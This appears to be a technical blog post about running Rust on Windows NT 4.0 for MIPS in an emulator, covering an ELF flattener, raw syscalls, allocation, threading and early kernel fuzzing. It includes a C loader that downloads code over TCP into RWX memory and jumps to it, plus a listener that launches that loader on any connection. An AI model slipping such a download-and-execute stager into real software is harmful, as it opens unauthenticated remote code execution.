Instead, I decided to just write an ELF flattener. It wouldn’t handle relocations, imports, exports, permissions or really anything. It wouldn’t even care about the architecture of the ELF or the payload. Simply, go through each LOAD section, place them at their desired address, and pad the space between them with zeros. This will give a flat in-memory representation of the binary as it would be loaded without relocations. It doesn’t matter if there’s some crazy custom assembly or sections defined, the LOAD sections are all that matters.

This tool is honestly relatively valuable for other things, as it can also flatten core dumps into a flat file if you want to inspect a core dump, which is also an ELF, with your own tooling. I've written this ELF loader a handful of times, so I thought it would be worthwhile writing my best version of it.

The loader simply parses the absolutely required information from the ELF. This includes checking \x7FELF magic, reading the endianness (affects the ELF integer endianness), and the bitness (also affects ELF layout). Any other information in the header is ignored. Then I parse the program headers, look for any LOAD sections (sections indicated by the ELF to be loaded into memory) and make the flat file.

The ELF format is fairly simple, and the LOAD sections contain information about the permissions, virtual address, virtual size (in-memory size), file offset (location of data to initialize the memory to), and the file size (can often be less than the memory size, thus any uninitialized bytes are padded to virtual memory size with zeros).

By concatenating these sections with the correct padding, voila, we have an in-memory representation of the ELF.

I decided to make a custom FELF ("Falk ELF") format that indicates where this blob needs to be loaded into memory, and the entry point address that needs to be jumped to to start execution.

FELF0001 - Magic header
entry    - 64-bit little endian integer of the entry point address
base     - 64-bit little endian integer of the base address to load the image
<image>  - Rest of the file is the raw image, to be loaded at `base` and jumped
           into at `entry`

Simple! You can find the source code to this tool at My GitHub for elfloader. This tool also has support for making a raw file, and picking a custom base, not for relocations, but for padding out the image. For example, if you have the core dump of a QEMU guest, you can run it through this tool with elfloader --binary --base=0 <coredump> and it will produce a flat file with no headers representing all physical memory, with MMIO holes and gaps padded with zero bytes. You can then mmap() the file and write your own tools to browse through a guest's physical memory (or virtual if you write page table walking code)! Maybe this is a problem I only find myself running into often, but within a few days of writing this I've even had a coworker use it.

Anyways, enough selling you on this first cool tool we produced. We can turn an ELF into an in-memory initial representation, woohoo.

FELF loader

To load a FELF for execution on Windows, we’ll of course need to write a loader. Of course we could convert the FELF into a PE, but at this point it’s less effort for us to just use the VC4.0 installation in our guest to write a very tiny loader. All we have to do is read a file, parse a simple header, VirtualAlloc() some RWX memory at the target address, copy the payload to the memory, and jump to entry!

Unfortunately, this is where it started to get dicey. I don't know if it's my window manager, QEMU, or Windows, but very frequently my mouse would start randomly jumping around in the VM. This meant that I pretty much had to do all of my development and testing in the VM with only the keyboard. So, we immediately scrapped the idea of loading a FELF from disk, and went for network loading.

Remote code execution

As long as we configured a unicast MAC address in our MIPS BIOS (yeah, we learned the hard way that non-unicast MAC addresses randomly generated by DuckDuckGo indeed fail in a very hard to debug way), we had access to our host machine (and the internet) in the guest.

Why load from disk, which would require shutting down the VM to mount the disk and copy the file in, when we could just make this a remote loader? So, that's what we did!

We wrote a very simple client that when invoked, would connect to the server, download a FELF, load it, and execute it. This was small enough that developing this inside the VM in VC4.0 was totally fine.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	unsigned int len;
	unsigned char *buf;
	unsigned int off = 0;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("192.168.1.2");
	sockaddr.sin_port = htons(1234);

	// Connect to the socket
	if(connect(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "connect() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload length
	if(recv(sock, (char*)&len, sizeof(len), 0) != sizeof(len)) {
		fprintf(stderr, "recv() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload
	buf = malloc(len);
	if(!buf) {
		perror("malloc() error ");
		return -1;
	}

	while(off < len) {
		int bread;
		unsigned int remain = len - off;
		bread = recv(sock, buf + off, remain, 0);
		if(bread <= 0) {
			fprintf(stderr, "recv(pl) error : %d", WSAGetLastError());
			return -1;
		}

		off += bread;
	}

	printf("Read everything %u\n", off);

	// FELF0001 + u64 entry + u64 base
	if(len < 3 * 8) {
		fprintf(stderr, "Invalid FELF\n");
		return -1;
	}

	{
		char *ptr = buf;
		unsigned int entry, base, hi, end;

		if(memcmp(ptr, "FELF0001", 8)) {
			fprintf(stderr, "Missing FELF header\n");
			return -1;
		}
		ptr += 8;

		entry = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		base = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		end = base + (len - 3 * 8);
		printf("Loading at %x-%x (%x) entry %x\n", base, end, end - base, entry);

		{
			unsigned int align_base = base & ~0xffff;
			unsigned int align_end  = (end + 0xffff) & ~0xffff;
			char *alloc = VirtualAlloc((void*)align_base,
				align_end - align_base, MEM_COMMIT | MEM_RESERVE,
				PAGE_EXECUTE_READWRITE);
			printf("Alloc attempt %x-%x (%x) | Got %p\n",
				align_base, align_end, align_end - align_base, alloc);
			if(alloc != (void*)align_base) {
				fprintf(stderr, "VirtualAlloc() error : %d\n", GetLastError());
				return -1;
			}

			// Copy in the code
			memcpy((void*)base, ptr, end - base);
		}

		// Jump to the entry
		((void (*)(SOCKET))entry)(sock);
	}

	return 0;
}

It’s not the best quality code, but it gets the job done. Nevertheless, this allows us to run whatever Rust program we develop in the VM! Running this client executable is all we need now.

Remote remote code execution

Unfortunately, having to switch to the VM, hit up arrow, and enter, is honestly a lot more than I want to have in my build process. I kind of think any build, dev, and test cycle that takes longer than a few seconds is just too painful to use. I don’t really care how complex the project is. In Chocolate Milk I demonstrated that I could build, upload to my server, hot replace, download Windows VM images, and launch hundreds of Windows VMs as part of my sub-2-second build process. This is an OS and hypervisor with hotswapping and re-launching of hundreds of Windows VMs in seconds (I think milliseconds for the upload, hot swap, and Windows VM launches if you ignore the 1-2 second Rust build). There’s just no excuse for shitty build and test processes for small projects like this.

Okay, very subtle flex aside, we need a better process. Luckily, we can remotely execute our remote code. To do this I created a server that runs inside the guest that waits for connections. On a connection it simply calls CreateProcess() and launches the client we talked about before. Now, we can “poke” the guest by simply connecting and disconnecting to the TCP port we forwarded.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d\n", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
	sockaddr.sin_port = htons(42069);

	if(bind(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "bind() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Listen for connections
	if(listen(sock, 5) == SOCKET_ERROR) {
		fprintf(stderr, "listen() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Wait for a client
	for( ; ; ) {
		STARTUPINFO si = { 0 };
		PROCESS_INFORMATION pi = { 0 };
		SOCKET client = accept(sock, NULL, NULL);

		// Upon getting a TCP connection, just start
		// a separate client process. This way the
		// client can crash and burn and this server
		// stays running just fine.
		CreateProcess(
			"client.exe",
			NULL,
			NULL,
			NULL,
			FALSE,
			CREATE_NEW_CONSOLE,
			NULL,
			NULL,
			&si,
			&pi
		);

		// We don't even transfer data, we just care about
		// the connection kicking off a client.
		closesocket(client);
	}

	return 0;
}

Very fancy code. Anyways, with this in place, we can just add a nc -w 0 127.0.0.1 5555 to our Makefile, and now the VM will download and run the new code we build. Combine this with cargo watch, and when we save one of the Rust files we're working on, it'll build, poke the VM, and run it! A simple :w and we have instant results from the VM!

(If you’re wondering, we create the client in a different process so we don’t lose the server if the client crashes, which it will)

Rust without OS support

Rust is designed to have a split of some of the core features of the language. There’s core which contains the bare essentials to have a usable language, alloc which gives you access to dynamic allocations, and std which gives you a OS-agnostic wrapper of common OS-level constructions like files, threads, and sockets.

Unfortunately, Rust doesn’t have support for NT4.0 on MIPS, so we immediately don’t have the ability to use std. However, we can still use core and alloc with a small amount of work.

Rust has one of the best cross-compiling supports of any compiler, as you can simply have Rust build core for your target, even if you don’t have the pre-compiled package. core is simple enough that it’s a few second build process, so it doesn’t really complicate your build. Seriously, look how cool this is:

cargo new --bin rustexample
#![no_std]
#![no_main]

#[panic_handler]
fn panic_handler(_info: &core::panic::PanicInfo) -> ! {
    loop {}
}

#[no_mangle]
pub unsafe extern fn __start() -> ! {
    unimplemented!();
}
pleb@gamey ~/rustexample $ cargo build --target mipsel-unknown-none -Zbuild-std=core
   Compiling core v0.0.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core)
   Compiling compiler_builtins v0.1.49
   Compiling rustc-std-workspace-core v1.99.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/rustc-std-workspace-core)
   Compiling rustexample v0.1.0 (/home/pleb/rustexample)
    Finished dev [unoptimized + debuginfo] target(s) in 8.84s

And there you go, you have a Rust binary for mipsel-unknown-none without having to download any pre-built toolchains, a libc, anything. You can immediately start building your program, using Rust-level constructs like slices and arrays with bounds checking, closures, whatever. No libc, no pre-built target-specific toolchains, nothing.

OS development in user-land

For educational reasons, and totally not because I just find it more fun, I decided that this project would not leverage the existing C libraries we have that do indeed exist in the MIPS guest. We could of course write PE importers to leverage the existing kernel32.dll and user32.dll present in all Windows processes by default, but no, that’s not fun. We can justify this by saying that the goal of this project is to fuzz the NT kernel, and thus we need to understand what syscalls look like.

So, with that in mind, we’re basically on our own. We’re effectively writing an OS in user-land, as we have absolutely no libraries or features by default. We have to write our inline assembly and work with raw pointers to bootstrap our execution environment for Rust.

The very first thing we need is a way of outputting debug information. I don’t care how we do this. It could be a file, a socket, the stdout, who cares. To do this, we’ll need to ask the kernel to do something via a syscall.

Syscall Layer

To invoke syscalls, we need to conform to a somewhat “custom” calling convention. System calls effectively are always indexed by some integer, selecting the API that you want to invoke. In the case of MIPS this is put into the $v0 register, which is not normally used as a calling convention. Thus, to perform a syscall with this modified convention, we have to use some assembly. Luckily, the rest of the calling convention for syscalls is unmodified from the standard MIPS o32 ABI, and we can pass through everything else.

To pass everything as is to the syscall we actually have to make sure Rust is using the same ABI as the kernel, we do this by declaring our function as extern, which switches us to the default MIPS o32 C ABI. Technically I think Windows does floating point register passing different than o32, but we’ll cross that bridge when we get there.

We need to be confident that the compiler is not emitting some weird prologue or moving around registers in our syscall function, and luckily Rust comes to the rescue again with a #[naked] function decorator. This marks the function as never inline-able, but also guarantees that no prolog or epilog are present in the function. This is common in a lot of low level languages, but Rust goes a step further and requires that naked functions only contain a single assembly statement that must not return (you must manually handle the return), and that your assembly is the first code that executes. Ultimately, it’s really just a global label on inline assembly with type information. Sweet.

So, we simply have to write a syscall helper for each number of arguments we want to support like such:

/// 2-argument syscall
#[allow(unused)]
#[naked]
pub unsafe extern fn syscall2(_: usize, _: usize, id: usize) -> usize {
    asm!(r#"
        move $v0, $a2
        syscall
    "#, options(noreturn));
}

We mark the function as naked, pass in the syscall ID as the last parameter (as to not disturb the ordering of the earlier parameters which we pass through to the syscall), move the syscall ID to $v0, and invoke the syscall. Weirdly, for MIPS, the syscall does not return to the instruction after the syscall, it actually returns to $ra, the return address, so it’s critical that the function is never inlined as this wrapper relies on returning back to the call site of the caller of syscall2(). Luckily, naked ensures this for us, and thus this wrapper is sufficient for syscalls!

Getting output

Back to the console: we initially started with trying to do stdout, but according to Twitch chat it sounds like on old Windows this was actually done via some RPC with conhost. So, we abandoned that. We wrote a tiny example of using NtOpenFile() and NtWriteFile() syscalls to drop a file to disk with a log, and this was a cool example of early syscalls, but still not convenient.

Remember, I’m picky about the development cycle.

So, we decided to go with a socket for our final build. Unfortunately, creating a socket in Windows via syscalls is actually pretty hard (I think it’s done mainly over IOCTLs), but we cheated here and just passed the handle from the FELF loader that already had to connect to our host. We can simply change our FELF server to serve the FELF to the VM and then recv() forever, printing out the console output. Now we have a remote console output.

Windows Syscalls

Windows syscalls are a lot heavier than what you might be used to on UNIX, they are also sometimes undocumented. Luckily, the NtWriteFile() syscall that we really need is actually not too bad. It takes a file handle, some optional stuff we don’t care about, an IO_STATUS_BLOCK (which returns number of bytes written), a buffer, a length, and an offset in the file to write to.

/// Write to a file
pub fn write(fd: &Handle, bytes: impl AsRef<[u8]>) -> Result<usize> {
    let mut offset = 0u64;
    let mut iosb = IoStatusBlock::default();

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall9(
            // [in] HANDLE FileHandle
            fd.0,

            // [in, optional] HANDLE Event
            0,

            // [in, optional] PIO_APC_ROUTINE ApcRoutine,
            0,

            // [in, optional] PVOID ApcContext,
            0,

            // [out] PIO_STATUS_BLOCK IoStatusBlock,
            addr_of_mut!(iosb) as usize,

            // [in] PVOID Buffer,
            bytes.as_ref().as_ptr() as usize,

            // [in] ULONG Length,
            bytes.as_ref().len(),

            // [in, optional] PLARGE_INTEGER ByteOffset,
            addr_of_mut!(offset) as usize,

            // [in, optional] PULONG Key
            0,

            // Syscall number
            Syscall::WriteFile as usize)
    } as u32);

    // If success, return number of bytes written, otherwise return error
    if status.success() {
        Ok(iosb.information)
    } else {
        Err(status)
    }
}

Rust print!() and formatting

To use Rust in the best way possible, we want to have support for the print!() macro, this is the printf() of the Rust world. It happens to be really easy to add support for!

/// Writer structure that simply implements [`core::fmt::Write`] such that we
/// can use `write_fmt` in our [`print!`]
pub struct Writer;

impl core::fmt::Write for Writer {
    fn write_str(&mut self, s: &str) -> core::fmt::Result {
        let _ = crate::syscall::write(unsafe { &SOCKET }, s);

        Ok(())
    }
}

/// Classic `print!()` macro
#[macro_export]
macro_rules! print {
    ($($arg:tt)*) => {
        let _ = core::fmt::Write::write_fmt(
            &mut $crate::print::Writer, core::format_args!($($arg)*));
    }
}

Simply create a dummy structure, implement core::fmt::Write on it, and now you can directly use Write::write_fmt() to write format strings. All you have to do is implement a sink for &strs, which is really just a char* and a length. In our case, we invoke the NtWriteFile() syscall with our socket we saved from the client.

Voila, we have remote output in a nice development environment:

pleb@gamey ~/mipstest $ felfserv 0.0.0.0:1234 ./out.felf


Serving 6732 bytes to 192.168.1.2:45914
---------------------------------
Hello world from Rust at 0x13370790
fn main() -> Result<(), ()> {
    println!("Hello world from Rust at {:#x}", main as usize);
    Ok(())
}

It’s that easy!

Memory allocation

Now that we have the basic ability to print things and use Rust, the next big feature that we’re missing is the ability to dynamically allocate memory. Luckily, we talked about the alloc feature of Rust before. Now, alloc isn’t something you get for free. Rust doesn’t know how to allocate memory in the environment you’re running it in, so you need to implement an allocator.

Luckily, once again, Rust is really friendly here. All you have to do is implement the GlobalAlloc trait on a global structure. You implement an alloc() function which takes in a Layout (size and alignment) and returns a *mut u8, NULL on failure. Then you have a dealloc() where you get the pointer that was used for the allocation, the Layout again (actually really nice to know the size of the allocation at free() time) and that’s it.

Since we don’t care too much about the performance of our dynamic allocator, we’ll just pass this information through directly to the NT kernel by doing virtual memory maps and frees.

use alloc::alloc::{Layout, GlobalAlloc};

/// Implementation of the global allocator
struct GlobalAllocator;

/// Global allocator object
#[global_allocator]
static GLOBAL_ALLOCATOR: GlobalAllocator = GlobalAllocator;

unsafe impl GlobalAlloc for GlobalAllocator {
    unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
        crate::syscall::mmap(0, layout.size()).unwrap_or(core::ptr::null_mut())
    }
    
    unsafe fn dealloc(&self, addr: *mut u8, _layout: Layout) {
        crate::syscall::munmap(addr as usize)
            .expect("Failed to deallocate memory");
    }
}

As for the syscalls, they're honestly not too bad here either, so I won't go into much more detail. You'll notice these are similar to VirtualAlloc(), a common API in Windows development.

/// Allocate virtual memory in the current process
pub fn mmap(mut addr: usize, mut size: usize) -> Result<*mut u8> {
    /// Commit memory
    const MEM_COMMIT: u32 = 0x1000;

    /// Reserve memory range
    const MEM_RESERVE: u32 = 0x2000;

    /// Readable and writable memory
    const PAGE_READWRITE: u32 = 0x4;

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall6(
            // [in] HANDLE ProcessHandle,
            !0,

            // [in, out] PVOID *BaseAddress,
            addr_of_mut!(addr) as usize,

            // [in] ULONG_PTR ZeroBits,
            0,

            // [in, out] PSIZE_T RegionSize,
            addr_of_mut!(size) as usize,

            // [in] ULONG AllocationType,
            (MEM_COMMIT | MEM_RESERVE) as usize,

            // [in] ULONG Protect
            PAGE_READWRITE as usize,

            // Syscall ID
            Syscall::AllocateVirtualMemory as usize,
        )
    } as u32);

    // If success, return allocation otherwise return status
    if status.success() {
        Ok(addr as *mut u8)
    } else {
        Err(status)
    }
}
    
/// Release memory range
const MEM_RELEASE: u32 = 0x8000;

/// De-allocate virtual memory in the current process
pub unsafe fn munmap(mut addr: usize) -> Result<()> {
    // Region size
    let mut size = 0usize;

    // Perform syscall
    let status = NtStatus(syscall4(
        // [in] HANDLE ProcessHandle,
        !0,

        // [in, out] PVOID *BaseAddress,
        addr_of_mut!(addr) as usize,

        // [in, out] PSIZE_T RegionSize,
        addr_of_mut!(size) as usize,

        // [in] ULONG AllocationType,
        MEM_RELEASE as usize,

        // Syscall ID
        Syscall::FreeVirtualMemory as usize,
    ) as u32);

    // Return error on error
    if status.success() {
        Ok(())
    } else {
        Err(status)
    }
}

And voilà. Now we can use Strings, Boxes, Vecs, BTreeMaps, and a whole list of other standard data structures in Rust. At this point, other than file I/O, networking, and threading, this environment is probably capable of running pretty much any generic Rust code, just by implementing two simple allocation functions. How cool is that!?
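For instance, with just those two functions in place, ordinary alloc-based code like the following now runs fine. This is a trivial sketch (assuming the crate pulls in extern crate alloc and the print!() macro from earlier):

use alloc::{boxed::Box, collections::BTreeMap, string::String, vec::Vec};

fn alloc_demo() {
    // A growable vector, backed by NtAllocateVirtualMemory() under the hood
    let mut squares = Vec::new();
    for i in 0u32..10 {
        squares.push(i * i);
    }

    // A heap-allocated string and box
    let greeting = String::from("heap says hi");
    let boxed    = Box::new(0x1337u32);

    // An ordered map, including all of its internal node allocations
    let mut map = BTreeMap::new();
    map.insert("answer", 42);

    print!("{} {:?} {:?} {:?}\n", greeting, squares, boxed, map.get("answer"));
}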

Threading

Some terrible person in my chat just had to ask "what about threading support". Of course, this could be an offhand comment that I dismiss or laugh at, but yeah, what about threading? After all, we want to write a fuzzer, and without threads it'll be hard to hit those juicy race conditions (totally necessary on 1996 software)?!

Well, this threw us for a huge loop. First of all, how do we actually create threads in Windows? And second, how do we do it in a Rust-style way, with closures that can be join()ed to get the return result?

Creating threads on Windows

Unfortunately, creating threads on Windows requires the NtCreateThread() syscall. This is not documented, and it honestly took a pretty long time to figure out. You don't actually give it a function pointer to execute and a parameter, like most higher-level thread creation libraries do.

Instead, you actually give it an entire CONTEXT. In Windows development, the CONTEXT structure is a very-specific-to-your-architecture structure that contains all of the CPU register state. So, you actually have to figure out the correct CONTEXT shape for your architecture (usually there are multiple, controlled by heavy #ifdefs). This might have taken us an hour to actually figure out, I don’t remember.

On top of this, you also provide it the stack register. Yep, you heard that right: you have to create the stack for the thread yourself. This is yet another step I wasn't really expecting that added to the complexity.

Anyways, at the end of the day, you launch a new thread in your process, you give it a CPU context (and by nature a stack and target entry address), and let it run off and do its thing.

However, this isn't very Rust-like. Rust allows you to optionally join() on a thread to get its return result; further, threads are started as closures, so you can pass arbitrary parameters to the thread with super convenient syntax, either by move or by reference.

Threading in Rust

This leads to a hard-ish problem. How do we get Rust-style threads? Until we wrote this, I never really even thought about it. Initially we thought about some fancy static ways of doing it, but ultimately, because closures are involved, you must put information on the heap. It's obvious in hindsight, but if you want to move ownership of some of your stack locals into this thread, how are you possibly going to do that without storing them somewhere? You can't let the thread use the parent's stack; that wouldn't work too well.

So, we implemented a spawn routine that takes in a closure (with the same constraints as Rust's own std::thread::spawn), puts the closure into a Box, turning it into a dynamically dispatched trait object (vftables and friends), and thus moves all of the variables captured by the closure onto the heap.

We can then invoke NtCreateThread() with a stack that we created, point the thread at a simple trampoline, and pass in a pointer to the raw backing of the Box. Then, in the trampoline, we convert the raw pointer back into a Box and invoke it! Now we've run the closure in the thread!

Return values

Unfortunately, this only gets us execution of the closure. We still have to add the ability to get return values from the thread. This has a unique design problem: the return value has to be accessible to the thread which created it, while also being accessible to the thread itself to initialize. Since the creator of the thread can also just ignore the thread's result, we can't rely on the creator to free the return storage, as the thread won't know whether that has happened (or you'd have to communicate it).

So, we ended up using an Arc<>. This is an atomically reference-counted, heap-allocated structure in Rust, and it ensures that the value lives as long as there is at least one reference. This works perfectly for this situation: we give one copy of the Arc to the thread (ref count 1), and then another copy to the creator of the thread (ref count 2). This way, the storage for the Arc is only freed once both the thread and the creator are done with it.

Further, we need to ensure some level of synchronization with the thread, as the creator cannot check the thread's return value until the thread has initialized it. Luckily, we can accomplish this in two ways. One: when a user join()s on a thread, it blocks until that thread finishes execution. To do this we invoke NtWaitForSingleObject(), which takes a HANDLE (given to us when we created the thread) and a timeout. By setting an infinite timeout we ensure that we do not do anything until the thread is done.

This leaves some implementation specific details about threads up in the air, like what happens with thread early termination, crashes, etc. Thus, we want to also ensure the return value has been updated in another way.

We did this by being creative with the Arc reference count. The Arc reference count can only be decreased by the thread when the Arc goes out of scope, and due to the way we designed the thread, this can only happen once the value has been successfully initialized.

Thus, in our main thread, we can call Arc::try_unwrap() on our return value; this will only succeed if we hold the only reference to the Arc, atomically ensuring that the thread has successfully updated the return value!
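Putting that together, join() ends up being just a few lines. Here's a minimal sketch of what ours roughly looks like; the JoinHandle shape matches the spawn() code below, but the wait_for_single_object() name is an assumption for a thin wrapper over NtWaitForSingleObject() in the same style as write() earlier:

/// Handle to a spawned thread: the thread handle plus the shared storage
/// for the thread's return value
pub struct JoinHandle<T>(Handle, Arc<UnsafeCell<MaybeUninit<T>>>);

impl<T> JoinHandle<T> {
    /// Block until the thread exits, then take its return value
    pub fn join(self) -> Option<T> {
        // Block on the thread handle with an infinite timeout
        // (hypothetical wrapper over NtWaitForSingleObject())
        crate::syscall::wait_for_single_object(&self.0, None).ok()?;

        // `try_unwrap` only succeeds once the thread has dropped its copy
        // of the `Arc`, which only happens after the return value was
        // written, so this doubles as our synchronization point
        Arc::try_unwrap(self.1).ok()
            .map(|cell| unsafe { cell.into_inner().assume_init() })
    }
}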

Now we have full Rust-style threading, à la:

fn main() -> Result<(), ()> {
    let a_local_value = 5;

    let thr = syscall::spawn(move || {
        println!("Hello world from Rust thread {}", a_local_value);
        core::cell::RefCell::new(22)
    }).unwrap();

    println!("Return val: {:?}", thr.join().unwrap());

    Ok(())
}
Serving 23500 bytes to 192.168.1.2:46026
---------------------------------
Hello world from Rust thread 5
Return val: RefCell { value: 22 }

HOW COOL IS THAT!? RIGHT!? This is on MIPS for Windows NT 4.0, an operating system from almost 20 years prior to Rust even existing! We have all the safety and fun features of bounds checking, dynamically growing vectors, scope-based dropping of references, locks, and allocations, etc.

Cleaning it all up

Unfortunately, we have a few leaks. We leak the handle that we got when we created the thread, and we also leak the stack of the thread itself. This is actually a tough-ish problem: how do we free the stack of a thread when we don't know when it exits (as the creator of the thread might never join() it)?

Well, the first problem is easy. Implement a Handle type, implement a Drop handler on it, and Rust will automatically clean up the handle when it goes out of scope by calling NtClose() in our Drop handler. Phew, that's easy.
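A minimal sketch of that Handle type, assuming a close() syscall stub over NtClose() in the same style as the other wrappers:

/// Owned handle which is automatically closed when dropped
pub struct Handle(pub usize);

impl Drop for Handle {
    fn drop(&mut self) {
        // Invoke NtClose() on the raw handle; we ignore the status as
        // there's not much we can do about a failed close here
        let _ = crate::syscall::close(self.0);
    }
}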

Freeing the stack is a bit harder, but we decided that the best route would be to have the thread free its own stack. This isn't too hard; it just means that we must free the stack and exit the thread without touching the stack, ideally without using any globals, as that would introduce race conditions.

Luckily, we can do this just fine if we implement the syscalls we need directly in one assembly block where we know we have full control.

// Region size
let mut rsize = 0usize;

// Free the stack and then exit the thread. We do this in one assembly
// block to ensure we don't touch any stack memory during this stage
// as we are freeing the stack.
unsafe {
    asm!(r#"
        // Set the link register
        jal 2f

        // Exit thread
        jal 3f
        break

    2:
        // NtFreeVirtualMemory()
        li $v0, {free}
        syscall

    3:
        // NtTerminateThread()
        li $v0, {terminate}
        li $a0, -2 // GetCurrentThread()
        li $a1, 0  // exit code
        syscall

    "#, terminate = const Syscall::TerminateThread   as usize,
        free      = const Syscall::FreeVirtualMemory as usize,
        in("$4") !0usize,
        in("$5") addr_of_mut!(stack),
        in("$6") addr_of_mut!(rsize),
        in("$7") MEM_RELEASE, options(noreturn));
}

Interestingly, we do technically have to pass a stack variable to NtFreeVirtualMemory(), but that's actually okay: either the kernel updates that variable before freeing the stack, and thus it's fine, or it updates the variable as an untrusted user pointer after freeing the stack and returns an error. We don't really care either way, as the stack is freed. Then, all we have to do is call NtTerminateThread() and we're all done.

Huzzah: fancy Rust threading, no memory leaks, and (hopefully) no race conditions.

/// Spawn a thread
///
/// MIPS specific due to some inline assembly as well as MIPS-specific context
/// structure creation.
pub fn spawn<F, T>(f: F) -> Result<JoinHandle<T>>
        where F: FnOnce() -> T,
              F: Send + 'static,
              T: Send + 'static {
    // Holder for returned client handle
    let mut handle = 0usize;

    // Placeholder for returned client ID
    let mut client_id = [0usize; 2];

    // Create a new context
    let mut context: Context = unsafe { core::mem::zeroed() };

    // Allocate and leak a stack for the thread
    let stack = vec![0u8; 4096].leak();

    // Initial TEB, maybe some stack stuff in here!?
    let initial_teb = [0u32; 5];

    /// External thread entry point
    extern fn entry<F, T>(func:      *mut F,
                          ret:       *mut UnsafeCell<MaybeUninit<T>>,
                          mut stack:  usize) -> !
            where F: FnOnce() -> T,
                  F: Send + 'static,
                  T: Send + 'static {
        // Create a scope so that we drop `Box` and `Arc`
        {
            // Re-box the FFI'd type
            let func: Box<F> = unsafe {
                Box::from_raw(func)
            };

            // Re-box the return type
            let ret: Arc<UnsafeCell<MaybeUninit<T>>> = unsafe {
                Arc::from_raw(ret)
            };

            // Call the closure and save the return
            unsafe { (&mut *ret.get()).write(func()); }
        }

        // Region size
        let mut rsize = 0usize;

        // Free the stack and then exit the thread. We do this in one assembly
        // block to ensure we don't touch any stack memory during this stage
        // as we are freeing the stack.
        unsafe {
            asm!(r#"
                // Set the link register
                jal 2f

                // Exit thread
                jal 3f
                break

            2:
                // NtFreeVirtualMemory()
                li $v0, {free}
                syscall

            3:
                // NtTerminateThread()
                li $v0, {terminate}
                li $a0, -2 // GetCurrentThread()
                li $a1, 0  // exit code
                syscall

            "#, terminate = const Syscall::TerminateThread   as usize,
                free      = const Syscall::FreeVirtualMemory as usize,
                in("$4") !0usize,
                in("$5") addr_of_mut!(stack),
                in("$6") addr_of_mut!(rsize),
                in("$7") MEM_RELEASE, options(noreturn));
        }
    }

    let rbox = unsafe {
        /// Control context
        const CONTEXT_CONTROL: u32 = 1;

        /// Floating point context
        const CONTEXT_FLOATING_POINT: u32 = 2;

        /// Integer context
        const CONTEXT_INTEGER: u32 = 4;

        // Set the flags for the registers we want to control
        context.context.bits64.flags =
            CONTEXT_CONTROL | CONTEXT_FLOATING_POINT | CONTEXT_INTEGER;

        // Thread entry point
        context.context.bits64.fir = entry::<F, T> as usize as u32;

        // Set `$a0` argument
        let cbox: *mut F = Box::into_raw(Box::new(f));
        context.context.bits64.int[4] = cbox as u64;
        
        // Create return storage in `$a1`
        let rbox: Arc<UnsafeCell<MaybeUninit<T>>> =
            Arc::new(UnsafeCell::new(MaybeUninit::uninit()));
        context.context.bits64.int[5] = Arc::into_raw(rbox.clone()) as u64;

        // Pass in stack in `$a2`
        context.context.bits64.int[6] = stack.as_mut_ptr() as u64;

        // Set the 64-bit `$sp` to the end of the stack
        context.context.bits64.int[29] =
            stack.as_mut_ptr() as u64 + stack.len() as u64;
        
        rbox
    };

    // Create the thread
    let status = NtStatus(unsafe {
        syscall8(
            // OUT PHANDLE ThreadHandle
            addr_of_mut!(handle) as usize,

            // IN ACCESS_MASK DesiredAccess
            0x1f03ff,

            // IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
            0,

            // IN HANDLE ProcessHandle
            !0,

            // OUT PCLIENT_ID ClientId
            addr_of_mut!(client_id) as usize,

            // IN PCONTEXT ThreadContext,
            addr_of!(context) as usize,

            // IN PINITIAL_TEB InitialTeb
            addr_of!(initial_teb) as usize,

            // IN BOOLEAN CreateSuspended
            0,

            // Syscall number
            Syscall::CreateThread as usize
        )
    } as u32);

    // Convert error to Rust error
    if status.success() {
        Ok(JoinHandle(Handle(handle), rbox))
    } else {
        Err(status)
    }
}

Fun oddities

While doing this work it was fun to notice that threads do not seem to die upon crashing. It would appear that the thread initialization thunk that Windows normally shims in when you create a thread registers some sort of exception handler, which then fires, and the thread itself reports the crash information to the kernel. At least in this version of NT, the crashing thread did not die, and the process didn't crash as a whole.

“Fuzzing” Windows NT

Windows NT 4.0 blue screen of death

Of course, the point of this project was to fuzz Windows NT. Well, it turns out that literally the very first thing we tried, randomly invoking a syscall, was all it took.

